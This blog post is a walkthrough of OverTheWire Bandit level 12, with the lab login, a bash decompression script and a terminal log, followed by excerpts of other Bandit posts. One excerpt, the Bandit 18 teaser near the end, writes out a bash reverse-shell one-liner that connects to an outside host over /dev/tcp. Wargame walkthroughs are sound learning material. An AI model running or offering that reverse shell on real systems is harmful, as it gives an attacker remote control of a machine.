Skip to main content

Bandit 12 Over The Wire

Lessons Learned

extracting and decompressing files using the following tools: file, xxd -r, gunzip, bunsip2, and tar -xf

Logging in

On a kali vm/ linux machine
Type:

ssh bandit12@bandit.labs.overthewire.org -p 2220 
5Te8Y4drgCRfCx8ugdwuEX8KFC6k2EUu

Completing The Challenge

The Goal:

The password for the next level is stored in the file data.txt, which is a hexdump of a file that has been repeatedly compressed. For this level it may be useful to create a directory under /tmp in which you can work using mkdir. For example: mkdir /tmp/myname123. Then copy the datafile using cp, and rename it using mv (read the manpages!)

The Solution:

    Revamped:

        I decided to write a bash file that solves the problem.
                mkdir /tmp/a_name/
                mv data.txt /tmp/a_name
                touch solver.sh
                chmod +x solver.sh
                add the following into solver.sh, can be done with nano and copy paste or you can type it out.

file="$1"
name=name
while ! grep -i "password" $file; do
    case $(file --mime-type -b "$file") in
        text/plain) name=name; xxd -r $file > $name; file=$name;;
        application/gzip) name='name.gz';  mv $file $name; gunzip $name; file=name;;
        application/x-bzip2) name='name.bz2'; mv $file $name; bunzip2 $name; file=name;;
        application/x-tar) name='name.tar'; mv $file $name; tar -xf $name -C tarfile; mv ./tarfile/data* name;file=name;;
        *) echo 'IDK'; break ;;
    esac
done 
       

kali@kali:~/Documents/bandit12$ ./solver.sh data.txt
The password is 8ZjyCRiBWFYkneahHwxCv3wb2a1ORpYL

    Old:

bandit12@bandit:~$ mkdir /tmp/fantms123
bandit12@bandit:~$ cp data.txt /tmp/fantms123
bandit12@bandit:~$ mv /tmp/fantms123/data.txt
bandit12@bandit:~$ xxd -r /tmp/fantms123/data.txt
 P�^data2.bin=��BZh91AY&SY�O����ڞOv���}?��}��^����������ߣ��;����▒4��▒h�F�F��4▒LM...
bandit12@bandit:~$  xxd -r /tmp/fantms123/data > /tmp/fantms123/data.bin
bandit12@bandit:~$ file /tmp/fantms123/data.bin
/tmp/fantms123/data.bin: gzip compressed data, was "data2.bin", last modified: Thu May  7 18:14:30 2020, max compression, from Unix
bandit12@bandit:~$ man gzip
bandit12@bandit:~$ gunzip /tmp/fantms123/data.bin
gzip: /tmp/fantms123/data.bin: unknown suffix -- ignored
bandit12@bandit:~$ mv /tmp/fantms123/data.bin /tmp/fantms123/data.zip
bandit12@bandit:~$ man gunzip
bandit12@bandit:~$ mv /tmp/fantms123/data.zip /tmp/fantms123/data.gz
bandit12@bandit:~$ mv /tmp/fantms123/data.gz /tmp/fantms123/data.bin.gz
bandit12@bandit:~$ gunzip /tmp/fantms123/data.bin.gz
bandit12@bandit:~$ cat /tmp/fantms123/data
data      data.bin  data.tar  data.txt  
bandit12@bandit:~$ cat /tmp/fantms123/data.bin
BZh91AY&SY�O...
bandit12@bandit:~$ file /tmp/fantms123/data.bin
/tmp/fantms123/data.bin: bzip2 compressed data, block size = 900k
bandit12@bandit:~$ man bzip2
bandit12@bandit:~$ mv /tmp/fantms123/data.bin /tmp/fantms123/data2.bin.bz2
bandit12@bandit:~$ bunzip2 /tmp/fantms123/data2.bin.bz2
bandit12@bandit:~$ file /tmp/fantms123/data2.bin
/tmp/fantms123/data2.bin: gzip compressed data, was "data4.bin", last modified: Thu May  7 18:14:30 2020, max compression, from Unix
bandit12@bandit:~$ mv /tmp/fantms123/data2.bin /tmp/fantms123/data4.bin.gzbandit12@bandit:~$ gunzip /tmp/fantms123/data4.bin.gz
bandit12@bandit:~$ file /tmp/fantms123/data4.bin
/tmp/fantms123/data4.bin: POSIX tar archive (GNU)
bandit12@bandit:~$ man tar
bandit12@bandit:~$ cp /tmp/fantms123/data4.bin /tmp/fantms123/data4.bin.tar
bandit12@bandit:~$ tar -xf /tmp/fantms123/data4.bin.tar -C /tmp/fantms123/test/
bandit12@bandit:~$ ls /tmp/fantms123/test/
data5.bin
bandit12@bandit:~$ cat /tmp/fantms123/test/data5.bin
data6.bin0000644000000000000000000000033613655050006011247 0ustar  rootrootBZh91AY&SY
bandit12@bandit:~$ file /tmp/fantms123/test/data5.bin
/tmp/fantms123/test/data5.bin: POSIX tar archive (GNU)
bandit12@bandit:~$ cp /tmp/fantms123/test/data5.bin /tmp/fantms123/test/data5.bin.tar
bandit12@bandit:~$ tar -xf /tmp/fantms123/test/data5.bin.tar -C /tmp/fantms123/test/
bandit12@bandit:~$ ls /tmp/fantms123/test/
data5.bin  data5.bin.tar  data6.bin
bandit12@bandit:~$ file /tmp/fantms123/test/data6.bin
/tmp/fantms123/test/data6.bin: bzip2 compressed data, block size = 900k
bandit12@bandit:~$ file /tmp/fantms123/test/data6.bin
/tmp/fantms123/test/data6.bin: bzip2 compressed data, block size = 900k
bandit12@bandit:~$ mv /tmp/fantms123/test/data6.bin /tmp/fantms123/test/data6.bin.bz2
bandit12@bandit:~$ bunzip2 /tmp/fantms123/test/data6.bin.bz2
bandit12@bandit:~$ file /tmp/fantms123/test/data6.bin
/tmp/fantms123/test/data6.bin: POSIX tar archive (GNU)
bandit12@bandit:~$ cp /tmp/fantms123/test/data6.bin /tmp/fantms123/test/data6.bin.tar
bandit12@bandit:~$ cat /tmp/fantms123/test/data6.bin.tar
data8.bin0000644000000000000000000000011713655050006011246...
bandit12@bandit:~$ tar -xf /tmp/fantms123/test/data6.bin.tar -C /tmp/fantms123/test/
bandit12@bandit:~$ ls /tmp/fantms123/test/
data5.bin  data5.bin.tar  data6.bin  data6.bin.tar  data8.bin
bandit12@bandit:~$ file /tmp/fantms123/test/data8.bin
/tmp/fantms123/test/data8.bin: gzip compressed data, was "data9.bin", last modified: Thu May  7 18:14:30 2020, max compression, from Unix
bandit12@bandit:~$ cp /tmp/fantms123/test/data8.bin /tmp/fantms123/test/data8.bin.gz
bandit12@bandit:~$ gunzip /tmp/fantms123/test/data8.bin.gz
gzip: /tmp/fantms123/test/data8.bin already exists; do you wish to overwrite (y or n)? y
bandit12@bandit:~$ cat /tmp/fantms123/test/data8.bin
The password is 8ZjyCRiBWFYkneahHwxCv3wb2a1ORpYL
 
Compressing tools need correct file extension in order to work
gunzip: .gz
bunzip: .bz2
tar: .tar

Comments

Popular posts from this blog

Bandit 11 Over The Wire

 Lessons Learned using cyberchef for things like rot13 Logging in On a kali vm/ linux machine Type: ssh bandit11@bandit.labs.overthewire.org -p 2220  IFukwKGsFW8MOq3IRFqrxE1hxTNEbUPR Completing The Challenge The Goal: The password for the next level is stored in the file data.txt , where all lowercase (a-z) and uppercase (A-Z) letters have been rotated by 13 positions The Solution: bandit11@bandit:~$ cat data.txt Gur cnffjbeq vf 5Gr8L4qetPEsPk8htqjhRK8XSP6x2RHh   The password is 5Te8Y4drgCRfCx8ugdwuEX8KFC6k2EUu This is known as rot13 and many free websites exist to solve this issue. CyberChef is a very good site/tool for this and can be downloaded

Bandit 18 Over The Wire

Lessons Learned ssh actions for when bashrc has immediate logout, also has advice on some reverse shell one liners Logging in On a kali vm/ linux machine Type: ssh bandit18@bandit.labs.overthewire.org -p 2220 kfBf3eYk5BPBRzwjqutbbfE887SVc5Yd Completing The Challenge The Goal: The password for the next level is stored in a file readme in the homedirectory. Unfortunately, someone has modified .bashrc to log you out when you log in with SSH. The Solution: kali@kali:~$ ssh bandit18@bandit.labs.overthewire.org -p 2220 'cat ~/readme' This is a OverTheWire game server. More information on http://www.overthewire.org/wargames bandit18@bandit.labs.overthewire.org's password: IueksS7Ubh8G3DCwVzrTd8rAVOwq3M5x Ive made reverse shells by doing one liner tcp calls using stuff like the following in the single quotes and by mixing commands using like the following: bash -i > & /dev/tcp/10.0.0.1/8080 0 > & 1